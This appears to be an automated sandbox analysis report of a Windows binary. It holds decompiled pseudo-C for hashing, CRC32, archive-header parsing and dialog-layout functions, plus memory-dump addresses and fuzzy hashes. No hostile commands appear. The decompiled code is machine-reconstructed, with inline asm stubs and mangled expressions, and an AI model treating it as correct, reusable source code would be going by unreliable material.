    								_v16 = _v16 ^  *((_v20 & 0x000000ff) + 0x874130);
    								_v15 = _v15 ^  *((_v19 & 0x000000ff) + 0x874130);
    								_v14 = _v14 ^  *((_v18 & 0x000000ff) + 0x874130);
    								_v13 = _v13 ^  *((_v17 & 0x000000ff) + 0x874130);
    								do {
    									_t130 = 4;
    									do {
    										_t96 =  *((intOrPtr*)(_t122 - 4));
    										 *_t122 =  *_t122 ^ _t96;
    										_t122 =  &(_t122[0]);
    										_t130 = _t130 - 1;
    									} while (_t130 != 0);
    									_t79 =  &_a4;
    									 *_t79 = _a4 - 1;
    								} while ( *_t79 != 0);
    							} else {
    								if(_t135 > 1) {
    									_t132 =  &_v28;
    									_a4 = _t135 - 1;
    									do {
    										_t124 = 0;
    										do {
    											_t96 =  *((intOrPtr*)(_t132 + _t124 - 4));
    											 *(_t132 + _t124) =  *(_t132 + _t124) ^ _t96;
    											_t124 = _t124 + 1;
    										} while (_t124 < 4);
    										_t132 = _t132 + 4;
    										_t53 =  &_a4;
    										 *_t53 = _a4 - 1;
    									} while ( *_t53 != 0);
    								}
    							}
    							_t131 = 0;
    							if(_t135 <= 0) {
    								L37:
    								_t164 = _t117 - _a4;
    							} else {
    								while(_t117 <= _a4) {
    									if(_t131 >= _t135) {
    										L33:
    										_t161 = _t133 - 4;
    									} else {
    										_t96 =  &(( &_v32)[_t131]);
    										_a4 = _t96;
    										while(_t133 < 4) {
    											 *((intOrPtr*)(_t137 + 0x18 + (_t133 + _t117 * 4) * 4)) =  *_t96;
    											_t131 = _t131 + 1;
    											_t96 = _a4 + 4;
    											_t133 = _t133 + 1;
    											_a4 = _t96;
    											if(_t131 < _t135) {
    												continue;
    											} else {
    												goto L33;
    											}
    											goto L34;
    										}
    									}
    									L34:
    									if(_t161 == 0) {
    										_t117 = _t117 + 1;
    										_t133 = 0;
    									}
    									if(_t131 < _t135) {
    										continue;
    									} else {
    										goto L37;
    									}
    									goto L38;
    								}
    							}
    							L38:
    							_t127 = _v36;
    						} while (_t164 <= 0);
    					}
    				} else {
    					while(_t117 <= _a4) {
    						if(_t126 < _t135) {
    							_t139 =  &(( &_v32)[_t126]);
    							while(_t133 < 4) {
    								_t125 = _t133 + _t117 * 4;
    								_t96 =  *_t139;
    								_t126 = _t126 + 1;
    								_t139 =  &_a4;
    								_t133 = _t133 + 1;
    								 *(_v40 + 0x18 + _t125 * 4) = _t96;
    								_t135 = _v36;
    								if(_t126 < _t135) {
    									continue;
    								}
    								break;
    							}
    							_t137 = _v40;
    						}
    						if(_t133 == 4) {
    							_t117 = _t117 + 1;
    							_t133 = 0;
    						}
    						if(_t126 < _t135) {
    							continue;
    						} else {
    							goto L10;
    						}
    						goto L39;
    					}
    				}
    				L39:
    				return _t96;
    			}






































    0x0083e54c
    0x0083e55c
    0x0083e55f
    0x0083e564
    0x0083e568
    0x0083e56d
    0x0083e570
    0x0083e572
    0x0083e574
    0x0083e578
    0x0083e5bf
    0x0083e5c2
    0x0083e5c8
    0x0083e5cd
    0x0083e5dc
    0x0083e5eb
    0x0083e5fa
    0x0083e609
    0x0083e60d
    0x0083e60f
    0x0083e614
    0x0083e61b
    0x0083e64c
    0x0083e650
    0x0083e658
    0x0083e65a
    0x0083e65b
    0x0083e65e
    0x0083e660
    0x0083e661
    0x0083e661
    0x0083e666
    0x0083e666
    0x0083e666
    0x0083e672
    0x0083e676
    0x0083e684
    0x0083e693
    0x0083e6a2
    0x0083e6b1
    0x0083e6b5
    0x0083e6b7
    0x0083e6b8
    0x0083e6b8
    0x0083e6bb
    0x0083e6bd
    0x0083e6be
    0x0083e6be
    0x0083e6c3
    0x0083e6c3
    0x0083e6c3
    0x0083e61d
    0x0083e620
    0x0083e629
    0x0083e62d
    0x0083e631
    0x0083e631
    0x0083e633
    0x0083e633
    0x0083e637
    0x0083e63a
    0x0083e63b
    0x0083e640
    0x0083e643
    0x0083e643
    0x0083e643
    0x0083e64a
    0x0083e620
    0x0083e6ca
    0x0083e6ce
    0x0083e70f
    0x0083e70f
    0x00000000
    0x0083e6d0
    0x0083e6d7
    0x0083e703
    0x0083e703
    0x0083e6d9
    0x0083e6dd
    0x0083e6e0
    0x0083e6e4
    0x0083e6ee
    0x0083e6f2
    0x0083e6f7
    0x0083e6fa
    0x0083e6fb
    0x0083e701
    0x00000000
    0x00000000
    0x00000000
    0x00000000
    0x00000000
    0x0083e701
    0x0083e6e4
    0x0083e706
    0x0083e706
    0x0083e708
    0x0083e709
    0x0083e709
    0x0083e70d
    0x00000000
    0x00000000
    0x00000000
    0x00000000
    0x00000000
    0x0083e70d
    0x0083e6d0
    0x0083e712
    0x0083e712
    0x0083e712
    0x0083e5cd
    0x00000000
    0x0083e57a
    0x0083e585
    0x0083e58b
    0x0083e58f
    0x0083e598
    0x0083e59b
    0x0083e59e
    0x0083e59f
    0x0083e5a2
    0x0083e5a3
    0x0083e5a7
    0x0083e5ad
    0x00000000
    0x00000000
    0x00000000
    0x0083e5ad
    0x0083e5af
    0x0083e5af
    0x0083e5b6
    0x0083e5b8
    0x0083e5b9
    0x0083e5b9
    0x0083e5bd
    0x00000000
    0x00000000
    0x00000000
    0x00000000
    0x00000000
    0x0083e5bd
    0x0083e57a
    0x0083e723
    0x0083e723

    Memory Dump Source
    • Source File: 00000000.00000002.202233566.0000000000831000.00000020.00020000.sdmp, Offset: 00830000, based on PE: true
    • Associated: 00000000.00000002.202224337.0000000000830000.00000002.00020000.sdmp Download File
    • Associated: 00000000.00000002.202260761.0000000000862000.00000002.00020000.sdmp Download File
    • Associated: 00000000.00000002.202274857.000000000086D000.00000004.00020000.sdmp Download File
    • Associated: 00000000.00000002.202282448.0000000000874000.00000004.00020000.sdmp Download File
    • Associated: 00000000.00000002.202289620.0000000000890000.00000004.00020000.sdmp Download File
    • Associated: 00000000.00000002.202295830.0000000000891000.00000002.00020000.sdmp Download File
    Similarity
    • API ID:
    • String ID:
    • API String ID:
    • Opcode ID: 6b58e4bcad248253532b889e27a2e567c1f526f5e415f0430c73ab030826cf7c
    • Instruction ID: f977ec8e6ea4d96185f346c8b2613b7d9dc09224a8bd21d8ed818bf34994db1a
    • Opcode Fuzzy Hash: 6b58e4bcad248253532b889e27a2e567c1f526f5e415f0430c73ab030826cf7c
    • Instruction Fuzzy Hash: 0E51E6305093954EC711DF29818446EBFE1FFEA314F49489DE4D987296D230DA45CBA3
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 80%
    			E0083F5FB() {
    				signed int _t85;
    				signed int* _t86;
    				unsigned int* _t87;
    				void* _t88;
    				unsigned int _t90;
    				unsigned int _t113;
    				signed int _t115;
    				signed int* _t120;
    				signed int _t121;
    				signed int* _t122;
    				signed int _t123;
    				void* _t135;
    				void* _t136;
    				void* _t137;
    				signed int _t138;
    				void* _t140;
    
    				_t120 =  *(_t140 + 0x130);
    				_t123 = 0;
    				_t86 =  &(_t120[0xa]);
    				do {
    					 *((intOrPtr*)(_t140 + 0x30 + _t123 * 4)) = E00855644( *_t86);
    					_t86 =  &(_t86[1]);
    					_t123 = _t123 + 1;
    				} while (_t123 < 0x10);
    				_t87 = _t140 + 0x68;
    				_t137 = 0x30;
    				do {
    					_t90 =  *(_t87 - 0x34);
    					_t113 =  *_t87;
    					asm("rol esi, 0xe");
    					_t87 =  &(_t87[1]);
    					asm("ror eax, 0x7");
    					asm("rol eax, 0xd");
    					asm("rol ecx, 0xf");
    					_t87[1] = (_t90 ^ _t90 ^ _t90 >> 0x00000003) + (_t113 ^ _t113 ^ _t113 >> 0x0000000a) +  *((intOrPtr*)(_t87 - 0x3c)) +  *((intOrPtr*)(_t87 - 0x18));
    					_t137 = _t137 - 1;
    				} while (_t137 != 0);
    				_t88 = 0;
    				_t138 = _t120[4];
    				_t115 = _t120[5];
    				 *(_t140 + 0x10) = _t120[1];
    				 *(_t140 + 0x20) = _t120[3];
    				 *(_t140 + 0x1c) =  *_t120;
    				 *(_t140 + 0x18) = _t120[6];
    				_t121 =  *(_t140 + 0x1c);
    				 *(_t140 + 0x14) = _t120[2];
    				 *(_t140 + 0x24) = _t120[7];
    				while(1) {
    					 *(_t140 + 0x28) = _t138;
    					asm("ror esi, 0xb");
    					asm("rol eax, 0x7");
    					asm("ror eax, 0x6");
    					 *(_t140 + 0x18) = _t115;
    					_t33 = _t88 + 0x862780; // 0x64
    					_t135 = (_t138 ^ _t138 ^ _t138) + ( !_t138 &  *(_t140 + 0x18) ^ _t115 & _t138) +  *_t33 +  *((intOrPtr*)(_t140 + _t88 + 0x2c));
    					_t88 = _t88 + 4;
    					_t136 = _t135 +  *(_t140 + 0x24);
    					 *(_t140 + 0x24) =  *(_t140 + 0x18);
    					_t138 =  *(_t140 + 0x20) + _t136;
    					asm("ror edx, 0xd");
    					asm("rol eax, 0xa");
    					asm("ror eax, 0x2");
    					_t85 =  *(_t140 + 0x10);
    					 *(_t140 + 0x10) = _t121;
    					 *(_t140 + 0x20) =  *(_t140 + 0x14);
    					 *(_t140 + 0x14) = _t85;
    					_t121 = (_t121 ^ _t121 ^ _t121) + (( *(_t140 + 0x14) ^  *(_t140 + 0x10)) & _t121 ^  *(_t140 + 0x14) &  *(_t140 + 0x10)) + _t136;
    					if(_t88 >= 0x100) {
    						break;
    					}
    					_t115 =  *(_t140 + 0x28);
    				}
    				 *(_t140 + 0x1c) = _t121;
    				_t122 =  *(_t140 + 0x130);
    				 *_t122 =  *_t122 +  *(_t140 + 0x1c);
    				_t122[1] = _t122[1] +  *(_t140 + 0x10);
    				_t122[2] = _t122[2] + _t85;
    				_t122[3] = _t122[3] +  *(_t140 + 0x20);
    				_t122[5] = _t122[5] +  *(_t140 + 0x28);
    				_t122[6] = _t122[6] +  *(_t140 + 0x18);
    				_t122[4] = _t122[4] + _t138;
    				_t122[7] = _t122[7] +  *(_t140 + 0x24);
    				return _t85;
    			}



















    0x0083f605
    0x0083f60c
    0x0083f60e
    0x0083f611
    0x0083f618
    0x0083f61c
    0x0083f61f
    0x0083f621
    0x0083f628
    0x0083f62c
    0x0083f62d
    0x0083f62d
    0x0083f632
    0x0083f636
    0x0083f639
    0x0083f63c
    0x0083f64a
    0x0083f64d
    0x0083f65f
    0x0083f662
    0x0083f662
    0x0083f66a
    0x0083f66e
    0x0083f671
    0x0083f674
    0x0083f67b
    0x0083f682
    0x0083f689
    0x0083f690
    0x0083f694
    0x0083f698
    0x0083f6a2
    0x0083f6a4
    0x0083f6a8
    0x0083f6ad
    0x0083f6bc
    0x0083f6d1
    0x0083f6d5
    0x0083f6dd
    0x0083f6e1
    0x0083f6e4
    0x0083f6e8
    0x0083f6ec
    0x0083f6ee
    0x0083f6f3
    0x0083f6fa
    0x0083f711
    0x0083f717
    0x0083f71f
    0x0083f723
    0x0083f727
    0x0083f730
    0x00000000
    0x00000000
    0x0083f69e
    0x0083f69e
    0x0083f736
    0x0083f73a
    0x0083f745
    0x0083f74b
    0x0083f750
    0x0083f757
    0x0083f75e
    0x0083f765
    0x0083f768
    0x0083f76f
    0x0083f77c

    Memory Dump Source
    • Source File: 00000000.00000002.202233566.0000000000831000.00000020.00020000.sdmp, Offset: 00830000, based on PE: true
    • Associated: 00000000.00000002.202224337.0000000000830000.00000002.00020000.sdmp Download File
    • Associated: 00000000.00000002.202260761.0000000000862000.00000002.00020000.sdmp Download File
    • Associated: 00000000.00000002.202274857.000000000086D000.00000004.00020000.sdmp Download File
    • Associated: 00000000.00000002.202282448.0000000000874000.00000004.00020000.sdmp Download File
    • Associated: 00000000.00000002.202289620.0000000000890000.00000004.00020000.sdmp Download File
    • Associated: 00000000.00000002.202295830.0000000000891000.00000002.00020000.sdmp Download File
    Similarity
    • API ID:
    • String ID:
    • API String ID:
    • Opcode ID: 7b53f485c255afbd291275d775bf63dd680a7592f80a1896200e4f4ffffb11ee
    • Instruction ID: f746b3f821fa5524cdde5a6deec5a721644d1b7a3f057057c2425ed2b5323915
    • Opcode Fuzzy Hash: 7b53f485c255afbd291275d775bf63dd680a7592f80a1896200e4f4ffffb11ee
    • Instruction Fuzzy Hash: 935124B1A083068BC748CF19D49055AF7E1FBC8314F054A2EE899E7741DB34E959CBDA
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 100%
    			E00843446(unsigned int __ecx) {
    				intOrPtr _t39;
    				signed int _t47;
    				intOrPtr _t48;
    				signed int _t55;
    				signed int _t61;
    				signed int _t66;
    				intOrPtr _t78;
    				signed int _t82;
    				unsigned char _t84;
    				signed int* _t86;
    				intOrPtr _t87;
    				unsigned int _t88;
    				unsigned int _t89;
    				signed int _t90;
    				void* _t91;
    
    				_t88 =  *(_t91 + 0x1c);
    				_t61 = 0;
    				_t86 =  *(_t91 + 0x24);
    				_t89 = __ecx;
    				 *(_t91 + 0x14) = __ecx;
    				_t86[3] = 0;
    				if( *((intOrPtr*)(_t88 + 8)) != 0 ||  *_t88 <=  *((intOrPtr*)(__ecx + 0x84)) - 7 || E00844495(__ecx) != 0) {
    					E0083A575(_t88,  ~( *(_t88 + 4)) & 0x00000007);
    					 *(_t91 + 0x14) = E0083A58C(_t88) >> 8;
    					E0083A575(_t88, 8);
    					_t66 =  *(_t91 + 0x10) & 0x000000ff;
    					_t39 = (_t66 >> 0x00000003 & 0x00000003) + 1;
    					 *((intOrPtr*)(_t91 + 0x20)) = _t39;
    					if(_t39 == 4) {
    						goto L3;
    					}
    					_t86[3] = _t39 + 2;
    					_t86[1] = (_t66 & 0x00000007) + 1;
    					 *(_t91 + 0x1c) = E0083A58C(_t88) >> 8;
    					E0083A575(_t88, 8);
    					if( *((intOrPtr*)(_t91 + 0x20)) <= _t61) {
    						L9:
    						_t84 =  *(_t91 + 0x10);
    						 *_t86 = _t61;
    						if((_t61 >> 0x00000010 ^ _t61 >> 0x00000008 ^ _t61 ^ _t84 ^ 0x0000005a) !=  *((intOrPtr*)(_t91 + 0x18))) {
    							goto L3;
    						}
    						_t47 =  *_t88;
    						_t86[2] = _t47;
    						_t23 = _t47 - 1; // -1
    						_t48 =  *((intOrPtr*)(_t89 + 0x88));
    						_t78 = _t23 + _t61;
    						if(_t48 >= _t78) {
    							_t48 = _t78;
    						}
    						 *((intOrPtr*)(_t89 + 0x88)) = _t48;
    						_t86[4] = _t84 >> 0x00000006 & 0x00000001;
    						_t86[4] = _t84 >> 7;
    						return 1;
    					}
    					_t87 =  *((intOrPtr*)(_t91 + 0x20));
    					_t90 = _t61;
    					do {
    						_t55 = E0083A58C(_t88) >> 8 << _t90;
    						_t90 = _t90 + 8;
    						_t61 = _t61 + _t55;
    						_t82 =  *(_t88 + 4) + 8;
    						 *_t88 =  *_t88 + (_t82 >> 3);
    						 *(_t88 + 4) = _t82 & 0x00000007;
    						_t87 = _t87 - 1;
    					} while (_t87 != 0);
    					_t86 =  *(_t91 + 0x24);
    					_t89 =  *(_t91 + 0x14);
    					goto L9;
    				} else {
    					L3:
    					return 0;
    				}
    			}


















    0x0084344c
    0x00843450
    0x00843453
    0x00843457
    0x00843459
    0x0084345d
    0x00843463
    0x0084348d
    0x008434a0
    0x008434a4
    0x008434ad
    0x008434b8
    0x008434b9
    0x008434c0
    0x00000000
    0x00000000
    0x008434c9
    0x008434cc
    0x008434dd
    0x008434e1
    0x008434ea
    0x00843525
    0x00843525
    0x00843535
    0x00843542
    0x00000000
    0x00000000
    0x00843548
    0x0084354a
    0x0084354d
    0x00843550
    0x00843556
    0x0084355a
    0x0084355c
    0x0084355c
    0x0084355e
    0x0084356e
    0x00843573
    0x00000000
    0x00843573
    0x008434ec
    0x008434f0
    0x008434f2
    0x008434fe
    0x00843500
    0x00843506
    0x00843508
    0x00843513
    0x00843515
    0x00843518
    0x00843518
    0x0084351d
    0x00843521
    0x00000000
    0x0084347b
    0x0084347b
    0x00000000
    0x0084347b

    Memory Dump Source
    • Source File: 00000000.00000002.202233566.0000000000831000.00000020.00020000.sdmp, Offset: 00830000, based on PE: true
    • Associated: 00000000.00000002.202224337.0000000000830000.00000002.00020000.sdmp Download File
    • Associated: 00000000.00000002.202260761.0000000000862000.00000002.00020000.sdmp Download File
    • Associated: 00000000.00000002.202274857.000000000086D000.00000004.00020000.sdmp Download File
    • Associated: 00000000.00000002.202282448.0000000000874000.00000004.00020000.sdmp Download File
    • Associated: 00000000.00000002.202289620.0000000000890000.00000004.00020000.sdmp Download File
    • Associated: 00000000.00000002.202295830.0000000000891000.00000002.00020000.sdmp Download File
    Similarity
    • API ID:
    • String ID:
    • API String ID:
    • Opcode ID: 32fd5146a60738f57232f45508c71c5fad50b2970f081f721f909f7bc4e013ae
    • Instruction ID: 9d9caf8524b3397fa3b28d04df9eb626d2e015f36c697a35975ede83dde23767
    • Opcode Fuzzy Hash: 32fd5146a60738f57232f45508c71c5fad50b2970f081f721f909f7bc4e013ae
    • Instruction Fuzzy Hash: F531B2B57047199FCB18DF28C8512AABBE0FB95304F10492DE4DAD7741C739EA09CB92
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 100%
    			E00835EAB(signed char _a4, signed char _a8, unsigned int _a12) {
    				signed char _t49;
    				signed char _t51;
    				signed char _t67;
    				signed char _t68;
    				unsigned int _t72;
    				unsigned int _t74;
    
    				_t67 = _a8;
    				_t49 = _a4;
    				_t74 = _a12;
    				if(_t74 != 0) {
    					while((_t67 & 0x00000007) != 0) {
    						_t49 = _t49 >> 0x00000008 ^  *(0x86e040 + ( *_t67 & 0x000000ff ^ _t49 & 0x000000ff) * 4);
    						_t67 = _t67 + 1;
    						_a8 = _t67;
    						_t74 = _t74 - 1;
    						if(_t74 != 0) {
    							continue;
    						}
    						goto L3;
    					}
    				}
    				L3:
    				if(_t74 >= 8) {
    					_t72 = _t74 >> 3;
    					do {
    						_t51 = _t49 ^  *_t67;
    						_t74 = _t74 - 8;
    						_t68 =  *(_t67 + 4);
    						_t67 = _a8 + 8;
    						_a8 = _t67;
    						_t49 =  *(0x86e040 + (_t68 >> 0x18) * 4) ^  *(0x86e440 + (_t68 >> 0x00000010 & 0x000000ff) * 4) ^  *(0x86e840 + (_t68 >> 0x00000008 & 0x000000ff) * 4) ^  *(0x86f040 + (_t51 >> 0x18) * 4) ^  *(0x86f440 + (_t51 >> 0x00000010 & 0x000000ff) * 4) ^  *(0x86f840 + (_t51 >> 0x00000008 & 0x000000ff) * 4) ^  *(0x86ec40 + (_t68 & 0x000000ff) * 4) ^  *(0x86fc40 + (_t51 & 0x000000ff) * 4);
    						_t72 = _t72 - 1;
    					} while (_t72 != 0);
    				}
    				if(_t74 != 0) {
    					do {
    						_t49 = _t49 >> 0x00000008 ^  *(0x86e040 + ( *_t67 & 0x000000ff ^ _t49 & 0x000000ff) * 4);
    						_t67 = _t67 + 1;
    						_t74 = _t74 - 1;
    					} while (_t74 != 0);
    				}
    				return _t49;
    			}









    0x00835eae
    0x00835eb2
    0x00835eb6
    0x00835ebb
    0x00835ebd
    0x00835ecd
    0x00835ed4
    0x00835ed5
    0x00835ed8
    0x00835edb
    0x00000000
    0x00000000
    0x00000000
    0x00835edb
    0x00835ebd
    0x00835edd
    0x00835ee0
    0x00835ee9
    0x00835eec
    0x00835eec
    0x00835eee
    0x00835ef1
    0x00835f4e
    0x00835f51
    0x00835f65
    0x00835f67
    0x00835f67
    0x00835f6c
    0x00835f6f
    0x00835f71
    0x00835f7c
    0x00835f83
    0x00835f84
    0x00835f84
    0x00835f71
    0x00835f8e

    Memory Dump Source
    • Source File: 00000000.00000002.202233566.0000000000831000.00000020.00020000.sdmp, Offset: 00830000, based on PE: true
    • Associated: 00000000.00000002.202224337.0000000000830000.00000002.00020000.sdmp Download File
    • Associated: 00000000.00000002.202260761.0000000000862000.00000002.00020000.sdmp Download File
    • Associated: 00000000.00000002.202274857.000000000086D000.00000004.00020000.sdmp Download File
    • Associated: 00000000.00000002.202282448.0000000000874000.00000004.00020000.sdmp Download File
    • Associated: 00000000.00000002.202289620.0000000000890000.00000004.00020000.sdmp Download File
    • Associated: 00000000.00000002.202295830.0000000000891000.00000002.00020000.sdmp Download File
    Similarity
    • API ID:
    • String ID:
    • API String ID:
    • Opcode ID: 3d273660321f89f5ab94be420e67dae406c32dac64f1dadfed3c965801588fde
    • Instruction ID: 2d126c6016182dde29488afbad02406c8ecd331454cd643a96ad2083cab3dbd0
    • Opcode Fuzzy Hash: 3d273660321f89f5ab94be420e67dae406c32dac64f1dadfed3c965801588fde
    • Instruction Fuzzy Hash: 6721D735A204758FCB08CF2DED9083A7350F79630174B812BEA46DF691D578E925C7E0
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 75%
    			E0083D754(struct HWND__* __ecx, void* __eflags, intOrPtr _a8, char _a12) {
    				struct HWND__* _v8;
    				short _v2048;
    				char _v2208;
    				char _v2288;
    				signed int _v2292;
    				char _v2300;
    				intOrPtr _v2304;
    				struct tagRECT _v2320;
    				intOrPtr _v2324;
    				intOrPtr _v2336;
    				struct tagRECT _v2352;
    				struct tagRECT _v2368;
    				signed int _v2376;
    				char _v2377;
    				intOrPtr _v2384;
    				intOrPtr _v2393;
    				void* __ebx;
    				void* __esi;
    				signed int _t96;
    				signed int _t104;
    				struct HWND__* _t106;
    				signed int _t119;
    				signed int _t134;
    				void* _t150;
    				void* _t155;
    				char _t156;
    				void* _t157;
    				signed int _t158;
    				intOrPtr _t160;
    				void* _t163;
    				void* _t169;
    				long _t170;
    				signed int _t174;
    				signed int _t185;
    				struct HWND__* _t186;
    				struct HWND__* _t187;
    				void* _t188;
    				void* _t191;
    				signed int _t192;
    				long _t193;
    				void* _t200;
    				int* _t201;
    				struct HWND__* _t202;
    				void* _t204;
    				void* _t205;
    				void* _t207;
    				void* _t209;
    				void* _t213;
    
    				_t202 = __ecx;
    				_v2368.bottom = __ecx;
    				E00833F53( &_v2208, 0x50, L"$%s:", _a8);
    				_t207 =  &_v2368 + 0x10;
    				E00841222( &_v2208,  &_v2288, 0x50);
    				_t96 = E00852C10( &_v2300);
    				_t186 = _v8;
    				_t155 = 0;
    				_v2376 = _t96;
    				_t209 =  *0x86d5f4 - _t155; // 0x63
    				if(_t209 <= 0) {
    					L8:
    					_t156 = E0083CDCF(_t155, _t202, _t188, _t213, _a8,  &(_v2368.right),  &(_v2368.top));
    					_v2377 = _t156;
    					GetWindowRect(_t186,  &_v2352);
    					GetClientRect(_t186,  &(_v2320.top));
    					_t169 = _v2352.right - _v2352.left + 1;
    					_t104 = _v2320.bottom;
    					_t191 = _v2352.bottom - _v2352.top + 1;
    					_v2368.right = 0x64;
    					_t204 = _t191 - _v2304;
    					_v2368.bottom = _t169 - _t104;
    					if(_t156 == 0) {
    						L15:
    						_t221 = _a12;
    						if(_a12 == 0 && E0083CE49(_t156, _v2368.bottom, _t221, _a8, L"CAPTION",  &_v2048, 0x400) != 0) {
    							SetWindowTextW(_t186,  &_v2048);
    						}
    						L18:
    						_t205 = _t204 - GetSystemMetrics(8);
    						_t106 = GetWindow(_t186, 5);
    						_t187 = _t106;
    						_v2368.bottom = _t187;
    						if(_t156 == 0) {
    							L24:
    							return _t106;
    						}
    						_t157 = 0;
    						while(_t187 != 0) {
    							__eflags = _t157 - 0x200;
    							if(_t157 >= 0x200) {
    								goto L24;
    							}
    							GetWindowRect(_t187,  &_v2320);
    							_t170 = _v2320.top.left;
    							_t192 = 0x64;
    							asm("cdq");
    							_t193 = _v2320.left;
    							asm("cdq");
    							_t119 = (_t170 - _t205 - _v2336) * _v2368.top;
    							asm("cdq");
    							_t174 = 0x64;
    							asm("cdq");
    							asm("cdq");
    							 *0x86dfd0(_t187, 0, (_t193 - (_v2352.right - _t119 % _t174 >> 1) - _v2352.bottom) * _v2368.right / _t174, _t119 / _t174, (_v2320.right - _t193 + 1) * _v2368.right / _v2352.top, (_v2320.bottom - _t170 + 1) * _v2368.top / _t192, 0x204);
    							_t106 = GetWindow(_t187, 2);
    							_t187 = _t106;
    							__eflags = _t187 - _v2384;
    							if(_t187 == _v2384) {
    								goto L24;
    							}
    							_t157 = _t157 + 1;
    							__eflags = _t157;
    						}
    						goto L24;
    					}
    					if(_a12 != 0) {
    						goto L18;
    					}
    					_t158 = 0x64;
    					asm("cdq");
    					_t134 = _v2292 * _v2368.top;
    					_t160 = _t104 * _v2368.right / _t158 + _v2352.right;
    					_v2324 = _t160;
    					asm("cdq");
    					_t185 = _t134 % _v2352.top;
    					_v2352.left = _t134 / _v2352.top + _t204;
    					asm("cdq");
    					asm("cdq");
    					_t200 = (_t191 - _v2352.left - _t185 >> 1) + _v2336;
    					_t163 = (_t169 - _t160 - _t185 >> 1) + _v2352.bottom;
    					if(_t163 < 0) {
    						_t163 = 0;
    					}
    					if(_t200 < 0) {
    						_t200 = 0;
    					}
    					 *0x86dfd0(_t186, 0, _t163, _t200, _v2324, _v2352.left,  !(GetWindowLongW(_t186, 0xfffffff0) >> 0xa) & 0x00000002 | 0x00000204);
    					GetWindowRect(_t186,  &_v2368);
    					_t156 = _v2393;
    					goto L15;
    				} else {
    					_t201 = 0x86d154;
    					do {
    						if( *_t201 > 0) {
    							_t9 =  &(_t201[1]); // 0x8633e0
    							_t150 = E008554A0( &_v2288,  *_t9, _t96);
    							_t207 = _t207 + 0xc;
    							if(_t150 == 0) {
    								_t12 =  &(_t201[1]); // 0x8633e0
    								if(E0083CFA0(_t155, _t202, _t201,  *_t12,  &_v2048, 0x400) != 0) {
    									SetDlgItemTextW(_t186,  *_t201,  &_v2048);
    								}
    							}
    							_t96 = _v2368.top;
    						}
    						_t155 = _t155 + 1;
    						_t201 =  &(_t201[3]);
    						_t213 = _t155 -  *0x86d5f4; // 0x63
    					} while (_t213 < 0);
    					goto L8;
    				}
    			}



















































    0x0083d76c
    0x0083d776
    0x0083d77a
    0x0083d77f
    0x0083d791
    0x0083d79b
    0x0083d7a0
    0x0083d7a7
    0x0083d7aa
    0x0083d7ae
    0x0083d7b4
    0x0083d811
    0x0083d829
    0x0083d831
    0x0083d835
    0x0083d841
    0x0083d853
    0x0083d85a
    0x0083d85e
    0x0083d861
    0x0083d869
    0x0083d86f
    0x0083d875
    0x0083d916
    0x0083d916
    0x0083d91e
    0x0083d94f
    0x0083d94f
    0x0083d955
    0x0083d960
    0x0083d962
    0x0083d968
    0x0083d96a
    0x0083d970
    0x0083da22
    0x0083da22
    0x0083da22
    0x0083d976
    0x0083da10
    0x0083d97d
    0x0083d983
    0x00000000
    0x00000000
    0x0083d98f
    0x0083d999
    0x0083d9ae
    0x0083d9b3
    0x0083d9b6
    0x0083d9cc
    0x0083d9d4
    0x0083d9d6
    0x0083d9d7
    0x0083d9df
    0x0083d9f1
    0x0083d9f8
    0x0083da01
    0x0083da07
    0x0083da09
    0x0083da0d
    0x00000000
    0x00000000
    0x0083da0f
    0x0083da0f
    0x0083da0f
    0x00000000
    0x0083da10
    0x0083d883
    0x00000000
    0x00000000
    0x0083d890
    0x0083d891
    0x0083d89a
    0x0083d89f
    0x0083d8a5
    0x0083d8a9
    0x0083d8aa
    0x0083d8b0
    0x0083d8ba
    0x0083d8c1
    0x0083d8ca
    0x0083d8ce
    0x0083d8d2
    0x0083d8d4
    0x0083d8d4
    0x0083d8d8
    0x0083d8da
    0x0083d8da
    0x0083d900
    0x0083d90c
    0x0083d912
    0x00000000
    0x0083d7b6
    0x0083d7b6
    0x0083d7bb
    0x0083d7be
    0x0083d7c1
    0x0083d7c9
    0x0083d7ce
    0x0083d7d3
    0x0083d7e4
    0x0083d7ee
    0x0083d7fb
    0x0083d7fb
    0x0083d7ee
    0x0083d801
    0x0083d801
    0x0083d805
    0x0083d806
    0x0083d809
    0x0083d809
    0x00000000
    0x0083d7bb

    APIs
    • _swprintf.LIBCMT ref: 0083D77A
      • Part of subcall function 00833F53: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 00833F66
      • Part of subcall function 00841222: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,000000FF,00000000,00000400,00000000,00000000,?,0Z,00000400,0083CEDA,00000000,?,00000050,0Z), ref: 0084123F
    • _strlen.LIBCMT ref: 0083D79B
    • SetDlgItemTextW.USER32(?,0086D154,?), ref: 0083D7FB
    • GetWindowRect.USER32(?,?), ref: 0083D835
    • GetClientRect.USER32(?,?), ref: 0083D841
    • GetWindowLongW.USER32(?,000000F0), ref: 0083D8DF
    • GetWindowRect.USER32(?,?), ref: 0083D90C
    • SetWindowTextW.USER32(?,?), ref: 0083D94F
    • GetSystemMetrics.USER32(00000008), ref: 0083D957
    • GetWindow.USER32(?,00000005), ref: 0083D962
    • GetWindowRect.USER32(00000000,?), ref: 0083D98F
    • GetWindow.USER32(00000000,00000002), ref: 0083DA01
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.202233566.0000000000831000.00000020.00020000.sdmp, Offset: 00830000, based on PE: true
    • Associated: 00000000.00000002.202224337.0000000000830000.00000002.00020000.sdmp Download File
    • Associated: 00000000.00000002.202260761.0000000000862000.00000002.00020000.sdmp Download File
    • Associated: 00000000.00000002.202274857.000000000086D000.00000004.00020000.sdmp Download File
    • Associated: 00000000.00000002.202282448.0000000000874000.00000004.00020000.sdmp Download File
    • Associated: 00000000.00000002.202289620.0000000000890000.00000004.00020000.sdmp Download File
    • Associated: 00000000.00000002.202295830.0000000000891000.00000002.00020000.sdmp Download File
    Similarity
    • API ID: Window$Rect$Text$ByteCharClientItemLongMetricsMultiSystemWide__vswprintf_c_l_strlen_swprintf
    • String ID: $%s:$CAPTION$d
    • API String ID: 2407758923-2512411981
    • Opcode ID: f3f28e10ae020be253f64a74bf50287a460b9f0fd48d890a16731879a717282c
    • Instruction ID: 78666e8c29cae57682ee1bb6384debd2c843650cdc047206e3065b18f1e8e6be
